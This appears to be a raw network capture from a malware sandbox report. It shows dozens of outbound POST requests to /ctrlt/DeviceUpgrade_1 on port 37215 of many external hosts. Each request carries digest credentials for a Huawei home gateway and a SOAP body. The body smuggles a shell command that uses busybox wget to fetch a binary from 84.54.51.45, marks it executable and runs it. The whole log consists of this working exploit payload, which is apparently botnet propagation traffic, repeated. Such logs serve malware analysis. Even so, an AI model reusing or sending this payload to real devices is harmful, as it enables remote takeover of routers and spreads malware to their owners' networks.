                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1917192.168.2.153771641.202.229.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600153923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1918192.168.2.153374641.174.200.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600172043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1919192.168.2.153631441.11.227.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600198984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1920192.168.2.155760241.59.212.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600199938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1921192.168.2.153644441.38.113.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600224018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1922192.168.2.153876841.134.74.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600281954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1923192.168.2.155380841.89.159.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600300074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1924192.168.2.153598041.230.243.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600306034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1925192.168.2.153544041.130.136.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600306034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1926192.168.2.155950641.233.67.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600317955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
